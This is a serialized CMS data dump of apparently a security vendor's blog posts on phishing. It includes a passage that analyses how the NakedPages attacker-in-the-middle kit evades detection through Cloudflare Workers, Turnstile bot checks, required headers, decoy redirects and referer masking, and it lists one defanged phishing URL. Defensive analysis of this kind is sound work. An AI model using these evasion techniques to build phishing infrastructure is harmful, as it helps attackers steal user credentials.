],{"data":52742,"content":52743,"nodeType":860},{},[52744],{"data":52745,"marks":52746,"value":48794,"nodeType":864},{},[],{"data":52748,"content":52749,"nodeType":860},{},[52750],{"data":52751,"marks":52752,"value":48801,"nodeType":864},{},[],{"data":52754,"content":52755,"nodeType":860},{},[52756],{"data":52757,"marks":52758,"value":48808,"nodeType":864},{},[],{"data":52760,"content":52761,"nodeType":1005},{},[],{"data":52763,"content":52764,"nodeType":1009},{},[52765],{"data":52766,"marks":52767,"value":40331,"nodeType":864},{},[],{"data":52769,"content":52770,"nodeType":860},{},[52771,52774,52781],{"data":52772,"marks":52773,"value":48824,"nodeType":864},{},[],{"data":52775,"content":52776,"nodeType":883},{"uri":5642},[52777],{"data":52778,"marks":52779,"value":40352,"nodeType":864},{},[52780],{"type":1455},{"data":52782,"marks":52783,"value":48835,"nodeType":864},{},[],{"data":52785,"content":52788,"nodeType":996},{"target":52786},{"sys":52787},{"id":48840,"type":1001,"linkType":1002},[],{"data":52790,"content":52791,"nodeType":860},{},[52792],{"data":52793,"marks":52794,"value":21,"nodeType":864},{},[],{"items":52796},[52797,52799],{"sys":52798,"name":6593},{"id":6592},{"sys":52800,"name":342},{"id":6596},{"items":52802},[52803],{"fullName":4878,"firstName":4879,"jobTitle":851,"profilePicture":52804},{"url":4881},"blog/dissecting-a-recent-mailchimp-phishing-attack",{"json":52807},{"data":52808,"content":52809,"nodeType":856},{},[52810],{"data":52811,"content":52812,"nodeType":860},{},[52813],{"data":52814,"marks":52815,"value":52816,"nodeType":864},{},[],"Have I Been Pwned creator and well-known security person Troy Hunt recently blogged about a phishing attack he fell for — a rare example of Attacker-in-the-Middle phishing being publicly discussed. Here’s what it tells us about how phishing is evolving and why even the best awareness training won't stop phishing attacks. ",{"id":49874,"publishedAt":52818},"2026-08-12T11:54:21.148Z",{"items":52820},[52821,52823],{"sys":52822,"name":6593},{"id":6592},{"sys":52824,"name":342},{"id":6596},{"items":52826},[52827,52829,52831,52833,52835,52837,52839,52841,52843,52845,52847,52849,52851,52853,52855,52857,52859,52861,52863],{"sys":52828,"name":279,"slug":280,"tier":31},{"id":276},{"sys":52830,"name":519,"slug":520,"tier":31},{"id":516},{"sys":52832,"name":413,"slug":414,"tier":31},{"id":410},{"sys":52834,"name":545,"slug":546,"tier":31},{"id":542},{"sys":52836,"name":342,"slug":343,"tier":31},{"id":339},{"sys":52838,"name":642,"slug":643,"tier":31},{"id":639},{"sys":52840,"name":324,"slug":325,"tier":45},{"id":321},{"sys":52842,"name":261,"slug":262,"tier":45},{"id":258},{"sys":52844,"name":528,"slug":529,"tier":45},{"id":525},{"sys":52846,"name":511,"slug":512,"tier":45},{"id":508},{"sys":52848,"name":466,"slug":467,"tier":45},{"id":463},{"sys":52850,"name":395,"slug":396,"tier":45},{"id":392},{"sys":52852,"name":422,"slug":423,"tier":45},{"id":419},{"sys":52854,"name":333,"slug":334,"tier":45},{"id":330},{"sys":52856,"name":571,"slug":572,"tier":45},{"id":568},{"sys":52858,"name":554,"slug":555,"tier":45},{"id":551},{"sys":52860,"name":502,"slug":503,"tier":45},{"id":499},{"sys":52862,"name":493,"slug":494,"tier":45},{"id":490},{"sys":52864,"name":431,"slug":432,"tier":45},{"id":428},"sZWoklIg0e2vgGAzpil8zIaBU6TuWysHnHs-WKQSO4s",{"id":52867,"title":52505,"authorsCollection":52868,"content":52873,"extension":228,"faqItemsCollection":53469,"faqTitle":59,"featured":6,"hashTags":59,"meta":53471,"metaTitle":53472,"ogImage":53473,"postType":13349,"publishedDate":52507,"relatedBlogPostsCollection":53475,"slug":52508,"stem":55529,"subtitle":59,"summary":55530,"synopsis":52506,"sys":55540,"tagsCollection":55542,"topicsCollection":55548,"__hash__":55578},"blog/blog/why-its-time-for-phishing-prevention-to-move-beyond-email.json",{"items":52869},[52870],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":52871,"profilePicture":52872},[18135],{"url":2740},{"json":52874,"links":53409},{"data":52875,"content":52876,"nodeType":856},{},[52877,52883,52909,52914,52920,52923,52930,52936,52942,52971,52977,52983,52989,52992,52999,53015,53021,53027,53032,53038,53044,53047,53054,53060,53066,53071,53077,53093,53119,53125,53128,53135,53141,53147,53152,53158,53164,53170,53175,53181,53186,53192,53195,53202,53208,53214,53217,53224,53230,53236,53242,53245,53252,53258,53264,53270,53276,53282,53287,53293,53299,53304,53310,53340,53346,53356,53372,53377,53380,53387,53393],{"data":52878,"content":52879,"nodeType":860},{},[52880],{"data":52881,"marks":52882,"value":51898,"nodeType":864},{},[],{"data":52884,"content":52885,"nodeType":860},{},[52886,52889,52896,52899,52906],{"data":52887,"marks":52888,"value":51905,"nodeType":864},{},[],{"data":52890,"content":52891,"nodeType":883},{"uri":4408},[52892],{"data":52893,"marks":52894,"value":19595,"nodeType":864},{},[52895],{"type":1455},{"data":52897,"marks":52898,"value":51916,"nodeType":864},{},[],{"data":52900,"content":52901,"nodeType":883},{"uri":51919},[52902],{"data":52903,"marks":52904,"value":51925,"nodeType":864},{},[52905],{"type":1455},{"data":52907,"marks":52908,"value":10094,"nodeType":864},{},[],{"data":52910,"content":52913,"nodeType":996},{"target":52911},{"sys":52912},{"id":51933,"type":1001,"linkType":1002},[],{"data":52915,"content":52916,"nodeType":860},{},[52917],{"data":52918,"marks":52919,"value":51941,"nodeType":864},{},[],{"data":52921,"content":52922,"nodeType":1005},{},[],{"data":52924,"content":52925,"nodeType":1009},{},[52926],{"data":52927,"marks":52928,"value":51952,"nodeType":864},{},[52929],{"type":899},{"data":52931,"content":52932,"nodeType":860},{},[52933],{"data":52934,"marks":52935,"value":51959,"nodeType":864},{},[],{"data":52937,"content":52938,"nodeType":860},{},[52939],{"data":52940,"marks":52941,"value":51966,"nodeType":864},{},[],{"data":52943,"content":52944,"nodeType":941},{},[52945,52958],{"data":52946,"content":52947,"nodeType":945},{},[52948],{"data":52949,"content":52950,"nodeType":860},{},[52951,52955],{"data":52952,"marks":52953,"value":51980,"nodeType":864},{},[52954],{"type":899},{"data":52956,"marks":52957,"value":51984,"nodeType":864},{},[],{"data":52959,"content":52960,"nodeType":945},{},[52961],{"data":52962,"content":52963,"nodeType":860},{},[52964,52968],{"data":52965,"marks":52966,"value":51995,"nodeType":864},{},[52967],{"type":899},{"data":52969,"marks":52970,"value":51999,"nodeType":864},{},[],{"data":52972,"content":52973,"nodeType":860},{},[52974],{"data":52975,"marks":52976,"value":52006,"nodeType":864},{},[],{"data":52978,"content":52979,"nodeType":860},{},[52980],{"data":52981,"marks":52982,"value":52013,"nodeType":864},{},[],{"data":52984,"content":52985,"nodeType":860},{},[52986],{"data":52987,"marks":52988,"value":52020,"nodeType":864},{},[],{"data":52990,"content":52991,"nodeType":1005},{},[],{"data":52993,"content":52994,"nodeType":1009},{},[52995],{"data":52996,"marks":52997,"value":52031,"nodeType":864},{},[52998],{"type":899},{"data":53000,"content":53001,"nodeType":860},{},[53002,53005,53012],{"data":53003,"marks":53004,"value":52038,"nodeType":864},{},[],{"data":53006,"content":53007,"nodeType":883},{"uri":52041},[53008],{"data":53009,"marks":53010,"value":52047,"nodeType":864},{},[53011],{"type":1455},{"data":53013,"marks":53014,"value":2924,"nodeType":864},{},[],{"data":53016,"content":53017,"nodeType":860},{},[53018],{"data":53019,"marks":53020,"value":52057,"nodeType":864},{},[],{"data":53022,"content":53023,"nodeType":860},{},[53024],{"data":53025,"marks":53026,"value":52064,"nodeType":864},{},[],{"data":53028,"content":53031,"nodeType":996},{"target":53029},{"sys":53030},{"id":52069,"type":1001,"linkType":1002},[],{"data":53033,"content":53034,"nodeType":860},{},[53035],{"data":53036,"marks":53037,"value":52077,"nodeType":864},{},[],{"data":53039,"content":53040,"nodeType":860},{},[53041],{"data":53042,"marks":53043,"value":52084,"nodeType":864},{},[],{"data":53045,"content":53046,"nodeType":1005},{},[],{"data":53048,"content":53049,"nodeType":1312},{},[53050],{"data":53051,"marks":53052,"value":52095,"nodeType":864},{},[53053],{"type":899},{"data":53055,"content":53056,"nodeType":860},{},[53057],{"data":53058,"marks":53059,"value":52102,"nodeType":864},{},[],{"data":53061,"content":53062,"nodeType":860},{},[53063],{"data":53064,"marks":53065,"value":52109,"nodeType":864},{},[],{"data":53067,"content":53070,"nodeType":996},{"target":53068},{"sys":53069},{"id":52114,"type":1001,"linkType":1002},[],{"data":53072,"content":53073,"nodeType":860},{},[53074],{"data":53075,"marks":53076,"value":52122,"nodeType":864},{},[],{"data":53078,"content":53079,"nodeType":860},{},[53080,53083,53090],{"data":53081,"marks":53082,"value":52129,"nodeType":864},{},[],{"data":53084,"content":53085,"nodeType":883},{"uri":52132},[53086],{"data":53087,"marks":53088,"value":52138,"nodeType":864},{},[53089],{"type":1455},{"data":53091,"marks":53092,"value":52142,"nodeType":864},{},[],{"data":53094,"content":53095,"nodeType":860},{},[53096,53099,53106,53109,53116],{"data":53097,"marks":53098,"value":52149,"nodeType":864},{},[],{"data":53100,"content":53101,"nodeType":883},{"uri":52152},[53102],{"data":53103,"marks":53104,"value":52158,"nodeType":864},{},[53105],{"type":1455},{"data":53107,"marks":53108,"value":52162,"nodeType":864},{},[],{"data":53110,"content":53111,"nodeType":883},{"uri":52165},[53112],{"data":53113,"marks":53114,"value":52171,"nodeType":864},{},[53115],{"type":1455},{"data":53117,"marks":53118,"value":52175,"nodeType":864},{},[],{"data":53120,"content":53121,"nodeType":860},{},[53122],{"data":53123,"marks":53124,"value":52182,"nodeType":864},{},[],{"data":53126,"content":53127,"nodeType":1005},{},[],{"data":53129,"content":53130,"nodeType":1312},{},[53131],{"data":53132,"marks":53133,"value":52193,"nodeType":864},{},[53134],{"type":899},{"data":53136,"content":53137,"nodeType":860},{},[53138],{"data":53139,"marks":53140,"value":52200,"nodeType":864},{},[],{"data":53142,"content":53143,"nodeType":860},{},[53144],{"data":53145,"marks":53146,"value":52207,"nodeType":864},{},[],{"data":53148,"content":53151,"nodeType":996},{"target":53149},{"sys":53150},{"id":52212,"type":1001,"linkType":1002},[],{"data":53153,"content":53154,"nodeType":860},{},[53155],{"data":53156,"marks":53157,"value":52220,"nodeType":864},{},[],{"data":53159,"content":53160,"nodeType":860},{},[53161],{"data":53162,"marks":53163,"value":52227,"nodeType":864},{},[],{"data":53165,"content":53166,"nodeType":860},{},[53167],{"data":53168,"marks":53169,"value":52234,"nodeType":864},{},[],{"data":53171,"content":53174,"nodeType":996},{"target":53172},{"sys":53173},{"id":48286,"type":1001,"linkType":1002},[],{"data":53176,"content":53177,"nodeType":860},{},[53178],{"data":53179,"marks":53180,"value":52246,"nodeType":864},{},[],{"data":53182,"content":53185,"nodeType":996},{"target":53183},{"sys":53184},{"id":52251,"type":1001,"linkType":1002},[],{"data":53187,"content":53188,"nodeType":860},{},[53189],{"data":53190,"marks":53191,"value":52259,"nodeType":864},{},[],{"data":53193,"content":53194,"nodeType":1005},{},[],{"data":53196,"content":53197,"nodeType":1009},{},[53198],{"data":53199,"marks":53200,"value":52270,"nodeType":864},{},[53201],{"type":899},{"data":53203,"content":53204,"nodeType":860},{},[53205],{"data":53206,"marks":53207,"value":52277,"nodeType":864},{},[],{"data":53209,"content":53210,"nodeType":860},{},[53211],{"data":53212,"marks":53213,"value":52284,"nodeType":864},{},[],{"data":53215,"content":53216,"nodeType":1005},{},[],{"data":53218,"content":53219,"nodeType":1009},{},[53220],{"data":53221,"marks":53222,"value":52295,"nodeType":864},{},[53223],{"type":899},{"data":53225,"content":53226,"nodeType":860},{},[53227],{"data":53228,"marks":53229,"value":52302,"nodeType":864},{},[],{"data":53231,"content":53232,"nodeType":860},{},[53233],{"data":53234,"marks":53235,"value":52309,"nodeType":864},{},[],{"data":53237,"content":53238,"nodeType":860},{},[53239],{"data":53240,"marks":53241,"value":52316,"nodeType":864},{},[],{"data":53243,"content":53244,"nodeType":1005},{},[],{"data":53246,"content":53247,"nodeType":1312},{},[53248],{"data":53249,"marks":53250,"value":52327,"nodeType":864},{},[53251],{"type":899},{"data":53253,"content":53254,"nodeType":860},{},[53255],{"data":53256,"marks":53257,"value":52334,"nodeType":864},{},[],{"data":53259,"content":53260,"nodeType":860},{},[53261],{"data":53262,"marks":53263,"value":52341,"nodeType":864},{},[],{"data":53265,"content":53266,"nodeType":860},{},[53267],{"data":53268,"marks":53269,"value":52348,"nodeType":864},{},[],{"data":53271,"content":53272,"nodeType":860},{},[53273],{"data":53274,"marks":53275,"value":52355,"nodeType":864},{},[],{"data":53277,"content":53278,"nodeType":860},{},[53279],{"data":53280,"marks":53281,"value":52362,"nodeType":864},{},[],{"data":53283,"content":53286,"nodeType":996},{"target":53284},{"sys":53285},{"id":48736,"type":1001,"linkType":1002},[],{"data":53288,"content":53289,"nodeType":860},{},[53290],{"data":53291,"marks":53292,"value":52374,"nodeType":864},{},[],{"data":53294,"content":53295,"nodeType":860},{},[53296],{"data":53297,"marks":53298,"value":52381,"nodeType":864},{},[],{"data":53300,"content":53303,"nodeType":996},{"target":53301},{"sys":53302},{"id":48772,"type":1001,"linkType":1002},[],{"data":53305,"content":53306,"nodeType":860},{},[53307],{"data":53308,"marks":53309,"value":52393,"nodeType":864},{},[],{"data":53311,"content":53312,"nodeType":941},{},[53313,53322,53331],{"data":53314,"content":53315,"nodeType":945},{},[53316],{"data":53317,"content":53318,"nodeType":860},{},[53319],{"data":53320,"marks":53321,"value":52406,"nodeType":864},{},[],{"data":53323,"content":53324,"nodeType":945},{},[53325],{"data":53326,"content":53327,"nodeType":860},{},[53328],{"data":53329,"marks":53330,"value":52416,"nodeType":864},{},[],{"data":53332,"content":53333,"nodeType":945},{},[53334],{"data":53335,"content":53336,"nodeType":860},{},[53337],{"data":53338,"marks":53339,"value":52426,"nodeType":864},{},[],{"data":53341,"content":53342,"nodeType":860},{},[53343],{"data":53344,"marks":53345,"value":52433,"nodeType":864},{},[],{"data":53347,"content":53348,"nodeType":860},{},[53349,53352],{"data":53350,"marks":53351,"value":52440,"nodeType":864},{},[],{"data":53353,"marks":53354,"value":52445,"nodeType":864},{},[53355],{"type":899},{"data":53357,"content":53358,"nodeType":860},{},[53359,53362,53369],{"data":53360,"marks":53361,"value":52452,"nodeType":864},{},[],{"data":53363,"content":53364,"nodeType":883},{"uri":52455},[53365],{"data":53366,"marks":53367,"value":52461,"nodeType":864},{},[53368],{"type":1455},{"data":53370,"marks":53371,"value":52465,"nodeType":864},{},[],{"data":53373,"content":53376,"nodeType":996},{"target":53374},{"sys":53375},{"id":52470,"type":1001,"linkType":1002},[],{"data":53378,"content":53379,"nodeType":1005},{},[],{"data":53381,"content":53382,"nodeType":1009},{},[53383],{"data":53384,"marks":53385,"value":40331,"nodeType":864},{},[53386],{"type":899},{"data":53388,"content":53389,"nodeType":860},{},[53390],{"data":53391,"marks":53392,"value":48392,"nodeType":864},{},[],{"data":53394,"content":53395,"nodeType":860},{},[53396,53399,53406],{"data":53397,"marks":53398,"value":40953,"nodeType":864},{},[],{"data":53400,"content":53401,"nodeType":883},{"uri":48401},[53402],{"data":53403,"marks":53404,"value":40352,"nodeType":864},{},[53405],{"type":1455},{"data":53407,"marks":53408,"value":52504,"nodeType":864},{},[],{"entries":53410},{"hyperlink":53411,"inline":53412,"block":53413},[],[],[53414,53422,53428,53435,53440,53443,53450,53456,53462],{"sys":53415,"__typename":1724,"title":53416,"caption":53417,"layoutMode":59,"file":53418},{"id":51933},"Source: 2024 Trends in Identity Security - Identity Defined Security Alliance (IDSA)","Source: 2024 Trends in Identity Security – Identity Defined Security Alliance (IDSA)",{"url":53419,"width":53420,"height":53421},"https://images.ctfassets.net/y1cdw1ablpvd/4wcIXJu4Yhq7lHZuGbX1w0/b097fff859f61a0e853f8a10e2d838aa/image7.png",1730,782,{"sys":53423,"__typename":1724,"title":53424,"caption":53425,"layoutMode":59,"file":53426},{"id":52069},"Evilginx screenshot - email controls blog","Evilginx being used to take over an M365 account",{"url":53427,"width":1736,"height":18798},"https://images.ctfassets.net/y1cdw1ablpvd/4fhOQ0Vohnrd8X0WaJkXDZ/82832b1f912717ca3782d9163daa8781/3.png",{"sys":53429,"__typename":1724,"title":53430,"caption":53431,"layoutMode":59,"file":53432},{"id":52114},"Pyramid of Pain: Original","Original Pyramid of Pain model, created by David Bianco.",{"url":53433,"width":22315,"height":53434},"https://images.ctfassets.net/y1cdw1ablpvd/7dPJT7PYKX71FCCi0GeDzg/16fb3b07959612a45c1b7636da33e541/image3.png",405,{"sys":53436,"__typename":1724,"title":53437,"caption":53438,"layoutMode":59,"file":53439},{"id":52212},"Turnstile requiring human interaction","Cloudflare Turnstile requiring human interaction",{"url":48463,"width":48464,"height":48465},{"sys":53441,"__typename":1724,"title":48475,"caption":48475,"layoutMode":59,"file":53442},{"id":48286},{"url":48477,"width":48478,"height":48479},{"sys":53444,"__typename":1724,"title":53445,"caption":53446,"layoutMode":59,"file":53447},{"id":52251},"Comparing a fake and real M365 login page","The left image is a fake login page — looks pretty believable though, right?",{"url":53448,"width":1736,"height":53449},"https://images.ctfassets.net/y1cdw1ablpvd/4piMCOgm2TgWBiKjyjL0Tw/d0a7ab35f9173f639b8454215536938e/7.png",871,{"sys":53451,"__typename":1724,"title":53452,"caption":53453,"layoutMode":59,"file":53454},{"id":48736},"Phishing detection without Push","Phishing detection: Without Push (it's not looking good...)",{"url":53455,"width":48486,"height":48487},"https://images.ctfassets.net/y1cdw1ablpvd/1oBYz6u0WH0gMnd89bkZjU/61bf589f62b898b91e4f8045caf1d4e1/Phishing_detection_without_Push__3_.png",{"sys":53457,"__typename":1724,"title":53458,"caption":53459,"layoutMode":59,"file":53460},{"id":48772},"Phishing detection: With Push","Phishing detection: With Push (Pow! Take that attacker)",{"url":53461,"width":48486,"height":48487},"https://images.ctfassets.net/y1cdw1ablpvd/7lxmav3wYkltbFp3N9KeIQ/06080c5b629590fe3551cf5944f011ec/Phishing_detection_with_Push__2_.png",{"sys":53463,"__typename":1724,"title":53464,"caption":53465,"layoutMode":59,"file":53466},{"id":52470},"Updated Pyramid of Pain (IoCs and TTPs)","Applying the Pyramid of Pain to identity-based attacks",{"url":53467,"width":1736,"height":53468},"https://images.ctfassets.net/y1cdw1ablpvd/7kfzRw2EuOtDbaDTIQI7r0/8304e44e0feb903e8db3bbdf12243d76/10.png",1477,{"items":53470},[],{},"Moving beyond email-based phishing prevention",{"url":53474},"https://images.ctfassets.net/y1cdw1ablpvd/5D3plIXabnqgyWWtxOXjHp/985db5f050236a3cfb7051dc873a39e2/1_-_Thumbnail.png",{"items":53476},[53477,54057,55243],{"__typename":2059,"sys":53478,"content":53480,"title":54043,"synopsis":54044,"hashTags":59,"publishedDate":54045,"slug":54046,"tagsCollection":54047,"authorsCollection":54053},{"id":53479},"11C3shj5SlkS8sAd3AlYDp",{"json":53481},{"data":53482,"content":53483,"nodeType":856},{},[53484,53504,53523,53530,53536,53543,53550,53557,53564,53572,53591,53598,53605,53612,53617,53624,53656,53663,53670,53677,53684,53690,53697,53704,53711,53742,53748,53755,53762,53793,53799,53806,53813,53820,53827,53833,53839,53846,53853,53860,53866,53873,53880,53887,53894,53913,53929,53935,53942,53949,53955,53962,53981,53987,53994,54021,54028,54035],{"data":53485,"content":53486,"nodeType":860},{},[53487,53491,53500],{"data":53488,"marks":53489,"value":53490,"nodeType":864},{},[],"It’s been well reported that ",{"data":53492,"content":53494,"nodeType":883},{"uri":53493},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/",[53495],{"data":53496,"marks":53497,"value":53499,"nodeType":864},{},[53498],{"type":1455},"identity attacks are on the rise",{"data":53501,"marks":53502,"value":53503,"nodeType":864},{},[],", and constantly evolving phishing tools and techniques are a big part of this. In particular, the increasing prevalence of MFA has led to AitM phishing attacks becoming much more common. The threat intelligence industry naturally wants to locate and shutdown all the phishing servers – but the phishers are fighting back.",{"data":53505,"content":53506,"nodeType":860},{},[53507,53511,53519],{"data":53508,"marks":53509,"value":53510,"nodeType":864},{},[],"Before we dive into how AitM phishing kits evade detection, you should check out our earlier blog post on ‘",{"data":53512,"content":53513,"nodeType":883},{"uri":35355},[53514],{"data":53515,"marks":53516,"value":53518,"nodeType":864},{},[53517],{"type":1455},"Phishing 2.0 – how phishing toolkits are evolving with AitM",{"data":53520,"marks":53521,"value":53522,"nodeType":864},{},[],"’ if you want to get up to speed with what these toolkits are, and why attackers are using them more regularly. ",{"data":53524,"content":53525,"nodeType":860},{},[53526],{"data":53527,"marks":53528,"value":53529,"nodeType":864},{},[],"In this blog post, we’re going to look at a recent instance of the NakedPages AitM phishing toolkit and some of the steps it takes to frustrate detection and analysis. In particular, we’ll look at how malicious activity is obfuscated through the use of legitimate SaaS services. NakedPages uses a range of different techniques and so serves as a good case study as to how AitM toolkits are being designed to evade detection.",{"data":53531,"content":53535,"nodeType":996},{"target":53532},{"sys":53533},{"id":53534,"type":1001,"linkType":1002},"2Qcn2nNRXVkdqqxGO8lDZf",[],{"data":53537,"content":53538,"nodeType":860},{},[53539],{"data":53540,"marks":53541,"value":53542,"nodeType":864},{},[],"Before we dive in, it’s useful to keep in mind that while there is a lot of complication here, most of this happens in seconds and is transparent to the intended victim accessing from a real browser.",{"data":53544,"content":53545,"nodeType":1009},{},[53546],{"data":53547,"marks":53548,"value":53549,"nodeType":864},{},[],"Step 1: Cloudflare Workers for the initial gateway",{"data":53551,"content":53552,"nodeType":860},{},[53553],{"data":53554,"marks":53555,"value":53556,"nodeType":864},{},[],"A key feature of the NakedPages kit is that it has several stages and redirections and, in order for it to operate as intended, the target has to arrive at the beginning. The first step involves visiting a URL that is simply a Cloudflare Worker. Cloudflare Workers are a serverless execution environment, a bit like AWS lambdas.",{"data":53558,"content":53559,"nodeType":860},{},[53560],{"data":53561,"marks":53562,"value":53563,"nodeType":864},{},[],"The benefit to the attacker is that this gives them a highly reputable primary domain as it is one owned and operated by Cloudflare. Flagging recently registered or uncategorized/rare domains for further analysis won’t work for this. For example, the URL used in this instance was the following:",{"data":53565,"content":53566,"nodeType":860},{},[53567],{"data":53568,"marks":53569,"value":53571,"nodeType":864},{},[53570],{"type":10610},"hxxps://226028cc.502f135e3e036e726fba22d4.workers.dev",{"data":53573,"content":53574,"nodeType":860},{},[53575,53579,53588],{"data":53576,"marks":53577,"value":53578,"nodeType":864},{},[],"For other examples of Cloudflare Workers being abused for phishing, ",{"data":53580,"content":53582,"nodeType":883},{"uri":53581},"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/its-raining-phish-and-scams-how-cloudflare-pages-dev-and-workers-dev-domains-get-abused/",[53583],{"data":53584,"marks":53585,"value":53587,"nodeType":864},{},[53586],{"type":1455},"check out this blog post from Trustwave",{"data":53589,"marks":53590,"value":2924,"nodeType":864},{},[],{"data":53592,"content":53593,"nodeType":1009},{},[53594],{"data":53595,"marks":53596,"value":53597,"nodeType":864},{},[],"Step 2: Cloudflare Turnstile for bot detection",{"data":53599,"content":53600,"nodeType":860},{},[53601],{"data":53602,"marks":53603,"value":53604,"nodeType":864},{},[],"The only purpose of the Cloudflare Worker is to act as a bot gateway to prevent automated analysis getting further than this point. For this it uses Cloudflare Turnstile. Turnstile is a highly effective tool for detecting the difference between bots and human users as a replacement for CAPTCHAs used by websites across the world. ",{"data":53606,"content":53607,"nodeType":860},{},[53608],{"data":53609,"marks":53610,"value":53611,"nodeType":864},{},[],"If it doesn’t work transparently then you’ll probably see something like this:",{"data":53613,"content":53616,"nodeType":996},{"target":53614},{"sys":53615},{"id":52212,"type":1001,"linkType":1002},[],{"data":53618,"content":53619,"nodeType":860},{},[53620],{"data":53621,"marks":53622,"value":53623,"nodeType":864},{},[],"However, who else wants to keep out the bots? Well, phishers of course! There are many sandbox environments and other automated platforms out there, visiting every URL they come across in the search for malicious behavior. This stops many of them in their tracks as they never get past the Turnstile check. ",{"data":53625,"content":53626,"nodeType":860},{},[53627,53631,53640,53644,53653],{"data":53628,"marks":53629,"value":53630,"nodeType":864},{},[],"Malicious use of Turnstile use has become much more common now. Examples include other criminal kits ",{"data":53632,"content":53634,"nodeType":883},{"uri":53633},"https://blog.sekoia.io/tycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit/",[53635],{"data":53636,"marks":53637,"value":53639,"nodeType":864},{},[53638],{"type":1455},"such as Tycoon",{"data":53641,"marks":53642,"value":53643,"nodeType":864},{},[],", as well as ",{"data":53645,"content":53647,"nodeType":883},{"uri":53646},"https://fin3ss3g0d.net/index.php/2024/04/08/evilgophishs-approach-to-advanced-bot-detection-with-cloudflare-turnstile/",[53648],{"data":53649,"marks":53650,"value":53652,"nodeType":864},{},[53651],{"type":1455},"open-source phishing tools focused on red teaming",{"data":53654,"marks":53655,"value":1774,"nodeType":864},{},[],{"data":53657,"content":53658,"nodeType":1009},{},[53659],{"data":53660,"marks":53661,"value":53662,"nodeType":864},{},[],"Step 3: Required URL parameters and custom auth headers",{"data":53664,"content":53665,"nodeType":860},{},[53666],{"data":53667,"marks":53668,"value":53669,"nodeType":864},{},[],"If you get past Turnstile, then you’ll finally be redirected to a more conventionally suspicious domain. However, you’ll need to supply the correct URL parameters and headers, or that request might behave differently. ",{"data":53671,"content":53672,"nodeType":860},{},[53673],{"data":53674,"marks":53675,"value":53676,"nodeType":864},{},[],"Suspicious domains can be found and interrogated through other means, such as observing new domain registrations or certificate transparency logs. In this case, the phishers add other steps involving required URL parameters and custom headers. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",{"data":53678,"content":53679,"nodeType":860},{},[53680],{"data":53681,"marks":53682,"value":53683,"nodeType":864},{},[],"The following code snippet shows how this operates. Bonus points for spotting how they actually forgot to implement their own RSA encryption function and instead send their “encrypted” user agents in clear text:",{"data":53685,"content":53689,"nodeType":996},{"target":53686},{"sys":53687},{"id":53688,"type":1001,"linkType":1002},"45aif31bot9phquQPkz20p",[],{"data":53691,"content":53692,"nodeType":1009},{},[53693],{"data":53694,"marks":53695,"value":53696,"nodeType":864},{},[],"Step 4: Requiring JavaScript execution",{"data":53698,"content":53699,"nodeType":860},{},[53700],{"data":53701,"marks":53702,"value":53703,"nodeType":864},{},[],"Another aspect of the previous step is that it requires JavaScript to execute. That means defensive techniques that simply make HTTP(S) requests and scrape content will not automatically be able to follow the link without allowing JavaScript execution. This forces the use of dynamic sandbox techniques that actually load a DOM, as it’s almost impossible for static analysis to generically solve this problem.",{"data":53705,"content":53706,"nodeType":1009},{},[53707],{"data":53708,"marks":53709,"value":53710,"nodeType":864},{},[],"Step 5: Redirecting to legitimate domains",{"data":53712,"content":53713,"nodeType":860},{},[53714,53718,53726,53730,53739],{"data":53715,"marks":53716,"value":53717,"nodeType":864},{},[],"Attackers will also redirect to legitimate domains to mask their activity. Let’s say a defender has visited the attacker’s malicious domain without executing JavaScript or supplying the correct URL parameters. The attacker doesn’t want to activate their malicious phishing behavior at this point, so they need to do something benign instead. In this case, they simply redirect to ",{"data":53719,"content":53721,"nodeType":883},{"uri":53720},"https://example.com",[53722],{"data":53723,"marks":53724,"value":53720,"nodeType":864},{},[53725],{"type":1455},{"data":53727,"marks":53728,"value":53729,"nodeType":864},{},[],". Interestingly, ",{"data":53731,"content":53733,"nodeType":883},{"uri":53732},"https://www.youtube.com/watch?v=-W-LxcbUxI4&t=643s",[53734],{"data":53735,"marks":53736,"value":53738,"nodeType":864},{},[53737],{"type":1455},"EvilProxy has also been seen redirecting to example.com too",{"data":53740,"marks":53741,"value":26971,"nodeType":864},{},[],{"data":53743,"content":53747,"nodeType":996},{"target":53744},{"sys":53745},{"id":53746,"type":1001,"linkType":1002},"450Y7W1uXVkKSps5y0xhBe",[],{"data":53749,"content":53750,"nodeType":1009},{},[53751],{"data":53752,"marks":53753,"value":53754,"nodeType":864},{},[],"Step 6: HTTP referer header masking",{"data":53756,"content":53757,"nodeType":860},{},[53758],{"data":53759,"marks":53760,"value":53761,"nodeType":864},{},[],"Maintainers of legitimate websites often look at the HTTP referer header to see where they are being linked from. This is often a critical task for businesses, particularly for things like marketing. However, what if employees spot strange redirects coming in from suspicious looking domains like the ones used by this phishing kit? Perhaps they might investigate those domains and/or tip off relevant security vendors and organizations. ",{"data":53763,"content":53764,"nodeType":860},{},[53765,53769,53777,53781,53789],{"data":53766,"marks":53767,"value":53768,"nodeType":864},{},[],"Unless, of course, you were to use a service to mask the HTTP referrer – which is exactly what the phishing kit does in this case. NakedPages makes use of ",{"data":53770,"content":53772,"nodeType":883},{"uri":53771},"https://href.li/",[53773],{"data":53774,"marks":53775,"value":53771,"nodeType":864},{},[53776],{"type":1455},{"data":53778,"marks":53779,"value":53780,"nodeType":864},{},[]," as a service to strip the referral to ensure the redirection is performed anonymously. Rather conveniently, it seems the default example that ",{"data":53782,"content":53784,"nodeType":883},{"uri":53783},"https://href.li",[53785],{"data":53786,"marks":53787,"value":53783,"nodeType":864},{},[53788],{"type":1455},{"data":53790,"marks":53791,"value":53792,"nodeType":864},{},[]," uses is… example.com:",{"data":53794,"content":53798,"nodeType":996},{"target":53795},{"sys":53796},{"id":53797,"type":1001,"linkType":1002},"78xFQwTG1r0YWGJ24iEdYP",[],{"data":53800,"content":53801,"nodeType":1009},{},[53802],{"data":53803,"marks":53804,"value":53805,"nodeType":864},{},[],"Step 7: Loading balanced domains",{"data":53807,"content":53808,"nodeType":860},{},[53809],{"data":53810,"marks":53811,"value":53812,"nodeType":864},{},[],"You’re probably thinking: Step 7? Surely, if a victim’s browser has finally made it this far then the attackers would just serve up the malicious phishing content at this point, right? Well, we aren’t quite done yet. These initial gateway servers are one of the most important components to keep undetected, as existing phishing campaigns and (as yet unread) emails will be leading to them.",{"data":53814,"content":53815,"nodeType":860},{},[53816],{"data":53817,"marks":53818,"value":53819,"nodeType":864},{},[],"Once we get to the more obviously 